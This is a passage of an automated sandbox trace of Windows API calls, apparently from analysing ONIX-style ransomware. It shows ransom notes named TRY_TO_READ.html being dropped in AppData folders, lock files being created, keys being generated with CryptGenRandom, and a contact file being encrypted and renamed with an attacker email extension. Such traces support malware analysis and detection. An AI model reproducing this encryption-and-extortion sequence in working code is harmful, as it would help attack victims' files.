lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0119.920] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData9c354ca09c354b444c.lock") returned 61 [0119.920] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0119.921] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.921] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1ae8 [0119.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0119.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0119.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0f8 | out: hHeap=0x410000) returned 1 [0119.921] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3283a610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3283a610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ed30 [0119.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0119.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.921] GetLastError () returned 0x0 [0119.921] FindNextFileW (in: hFindFile=0x48ed30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3283a610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3283a610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.921] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.922] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.922] GetLastError () returned 0x0 [0119.922] FindNextFileW (in: hFindFile=0x48ed30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0119.922] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.922] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.922] GetLastError () returned 0x0 [0119.922] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0119.923] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4589f0 | out: hHeap=0x410000) returned 1 [0119.923] WriteFile (in: hFile=0x49c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0119.924] WriteFile (in: hFile=0x49c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0119.924] WriteFile (in: hFile=0x49c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0119.924] CloseHandle (hObject=0x49c) returned 1 [0119.924] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0119.924] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0119.924] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.924] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1bb8 | out: hHeap=0x410000) returned 1 [0119.924] FindNextFileW (in: hFindFile=0x48ed30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0119.924] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.924] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.924] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.924] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.924] GetLastError () returned 0x0 [0119.925] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0119.925] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0119.925] WriteFile (in: hFile=0x49c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0119.926] WriteFile (in: hFile=0x49c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0119.926] WriteFile (in: hFile=0x49c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0119.926] CloseHandle (hObject=0x49c) returned 1 [0119.927] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0119.927] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0119.927] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.927] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1c20 | out: hHeap=0x410000) returned 1 [0119.927] FindNextFileW (in: hFindFile=0x48ed30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3283a610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3283a610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0119.927] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.927] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.927] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.927] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.927] GetLastError () returned 0x0 [0119.927] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0119.927] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4589f0 | out: hHeap=0x410000) returned 1 [0119.927] WriteFile (in: hFile=0x49c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0119.928] WriteFile (in: hFile=0x49c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0119.928] WriteFile (in: hFile=0x49c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0119.928] CloseHandle (hObject=0x49c) returned 1 [0119.928] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0119.928] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0119.928] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.928] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1c88 | out: hHeap=0x410000) returned 1 [0119.928] FindNextFileW (in: hFindFile=0x48ed30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3283a610, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3283a610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3283a610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0119.928] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.929] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.929] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.929] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.929] GetLastError () returned 0xb7 [0119.929] FindNextFileW (in: hFindFile=0x48ed30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3283a610, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3283a610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3283a610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0119.929] CloseHandle (hObject=0x3cc) returned 1 [0119.929] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.929] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x3b, wMilliseconds=0x132)) [0119.929] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0119.930] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0119.930] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0119.930] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data9c354ca09c354b444c.lock") returned 70 [0119.930] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0119.930] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.931] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.931] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x43d858 [0119.931] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0119.931] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0119.931] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d0a8 | out: hHeap=0x410000) returned 1 [0119.931] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3283a610, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3283a610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3283a610, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0119.931] CloseHandle (hObject=0x3cc) returned 1 [0119.932] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.932] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x3b, wMilliseconds=0x132)) [0119.932] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0119.932] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0119.932] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0119.932] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts9c354ca09c354b444c.lock") returned 62 [0119.932] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0119.933] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.933] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.933] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0119.933] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0119.933] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b378 | out: hHeap=0x410000) returned 1 [0119.933] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47d008 | out: hHeap=0x410000) returned 1 [0119.933] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ed70 [0119.934] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.934] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.934] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.934] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.934] GetLastError () returned 0x0 [0119.934] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.934] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.934] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.934] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.934] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.934] GetLastError () returned 0x0 [0119.934] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0119.934] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.934] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.934] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.934] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.934] GetLastError () returned 0x0 [0119.934] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a0 [0119.935] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.935] LockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x49a, nNumberOfBytesToLockHigh=0x0) returned 1 [0119.935] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.935] ReadFile (in: hFile=0x4a0, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0119.937] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.937] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.937] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0119.937] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0119.937] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", dwFileAttributes=0x80) returned 1 [0119.937] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 63 [0119.937] GetProcessHeap () returned 0x410000 [0119.937] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xee) returned 0x449878 [0119.937] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" [0119.937] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0119.938] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1178) returned 1 [0119.938] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x49a [0119.938] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0119.938] GetProcessHeap () returned 0x410000 [0119.938] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0119.938] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0119.938] WriteFile (in: hFile=0x4a0, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0119.940] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0119.941] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.942] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x49a) returned 0x4d8b68 [0119.942] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x49a) returned 0x4d9010 [0119.942] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.942] ReadFile (in: hFile=0x4a0, 